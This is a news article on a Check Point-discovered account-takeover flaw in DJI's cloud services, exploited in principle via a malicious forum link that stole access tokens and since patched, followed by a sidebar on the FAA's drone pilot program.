Was YOUR drone hacked? Flaw in DJI website exposed user data and gave hackers access to live feeds

  • Check Point security researchers found a flaw in DJI's cloud infrastructure
  • It allowed hackers to take over users' accounts and access private data like drone logs with location data, maps, account information and photos or videos
  • Vulnerability came from a malicious link being shared by hackers on DJI forms
  • DJI became aware of the vulnerability in March and has since patched the flaw 

A worrying vulnerability in DJI drones gave hackers complete access to a user's account without them realizing it.

Security researchers from Check Point in March discovered a flaw in DJI's cloud infrastructure that allowed attackers to take over users' accounts and access private data like drone logs with location data, maps, account information and photos or videos taken during flight. 

However, DJI said it patched the vulnerability in September. 

Scroll down for video 

A worrying vulnerability in DJI drones gave hackers complete access to a user's account. DJI said it patched the flaw, which affected its cloud infrastructure, in September

A worrying vulnerability in DJI drones gave hackers complete access to a user's account. DJI said it patched the flaw, which affected its cloud infrastructure, in September

WHAT INFORMATION DID HACKERS HAVE ACCESS TO? 

  • Account credentials, store information, forum data 
  • Cloud-synced flight logs, photos and videos during drone flights 
  • A live camera view and map view during drone flights   
Advertisement

Users fell prey to the attack by clicking on a malicious link shared through DJI Forum, an online forum the firm runs for user discussions about its products. 

Any user who clicked on a 'specially-planted malicious link,' could have had his or her login information stolen, giving the hacker access to cloud data, account information, store, forum and other data. 

It also gave them access to user data from FlightHub, DJI's fleet management system that stores live feed footage. 

The vulnerability stemmed from hackers taking advantage of authentication tokens. This lets users move between various DJI sites without having to sign in every time. 

Hackers took advantage of this feature in Facebook's most recent data breach in September, which resulted in 50 million user accounts being compromised. 

'This is a very deep vulnerability,' Oded Vanunu, head of products vulnerability research at Check Point, told WIRED

'We're drone fans and fans of DJI, but we want to bring awareness about account takeover vulnerabilities in big vendors' systems. 

The vulnerability stemmed from hackers taking advantage of authentication tokens. This lets users move between various DJI sites without having to sign in every time

The vulnerability stemmed from hackers taking advantage of authentication tokens. This lets users move between various DJI sites without having to sign in every time

'In order to let users access different services without having to enter a username and password all the time, companies use one-time authentication to make a user token that's valid across everything. 

'But that means we're living in an era where a targeted attack can become an extensive compromise,' Vanunu added. 

DJI said Check Point reported the flaw through its bug bounty program and the firm has since thoroughly examined its software and hardware to make sure the attack can't be replicated. 

Ultimately, DJI engineers marked the vulnerability as 'high risk - low probability,' because it would hard to carry out in real life.     

'This is because the vulnerability required a complicated set of preconditions to be successfully exploited: The user would have to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum,' a DJI spokesperson said in a statement. 

Hackers were able to take over users' accounts and access private data like drone logs with location data, maps (pictured), account information and photos or videos taken during flight

Hackers were able to take over users' accounts and access private data like drone logs with location data, maps (pictured), account information and photos or videos taken during flight

It also gave them access to user data from FlightHub, DJI's fleet management system that stores live feed footage. The vulnerability stemmed from users clicking on malicious forum link

It also gave them access to user data from FlightHub, DJI's fleet management system that stores live feed footage. The vulnerability stemmed from users clicking on malicious forum link

'DJI engineers efficiently and effectively patched this vulnerability after being notified by Check Point Research. There is no evidence it was ever exploited.' 

Check Point detailed how attackers were able to gain access to users' accounts. The link posted in the forums included an extra chunk of software code.

When users clicked on it, it silently triggered a script to run in the background, collecting 'cookies' that contained the users' access tokens. 

By using the access tokens, it allowed hackers to bypass extra security layers like two-factor authentication, meaning that users wouldn't know if their account had been compromised.  

'This case was alarming because drones have a lot of private information and this was something that could be taken easily,' Vanunu told Wired.

'Giant platforms need to be more careful about account takeovers.'  

WHAT IS THE US GOVERNMENT DOING TO IMPROVE DRONE TECHNOLOGY?

President Donald Trump signed a directive in 2017 to establish the 'innovation zones' that allow exemptions to some drone regulations, such as flying over people, nighttime flights and flights where the aircraft can't be seen by the operator. 

States, communities and tribes selected to participate would devise their own trial programs in partnership with government and industry drone users.

'Data gathered from these pilot projects will form the basis of a new regulatory framework to safely integrate drones into our national airspace,' US Secretary of Transportation Elaine Chao said in a statement.

Ms Chao, who called the rapidly developing drone industry the biggest development since the jet age, said about 150 applications were received.

Ten sites have been included in a the Federal Aviation Administration's Unmanned Aircraft Systems Integration Pilot Program. 

Selected were the Choctaw Nation of Oklahoma; the cities of San Diego, California, and Reno, Nevada; state transportation departments in North Dakota, North Carolina and Kansas; University of Alaska-Fairbanks; the Center for Innovative Technology in Virginia; Memphis-Shelby County Airport Authority in Memphis, Tennessee; and the Lee County Mosquito Control District in Fort Meyers, Florida.

North Dakota lieutenant governor Brent Sanford said the program will spur more commercial investment and 'allow us to explore new uses for unmanned aircraft.'

He envisioned drones helping with oil field, flood and weather monitoring, and 'finding missing persons.'

The unmanned aircraft industry has pushed for relaxed restrictions, and the Trump administration has said current regulations have limited drone use, forcing companies to test overseas.

Steven Bradbury, a lawyer for the federal Transportation Department, said drones have caused some 'apprehension' with the public but one of the initiative's biggest goals will be increased 'community awareness and acceptance' of unmanned aircraft.

Mr Bradbury said there is no direct federal funding for the test program.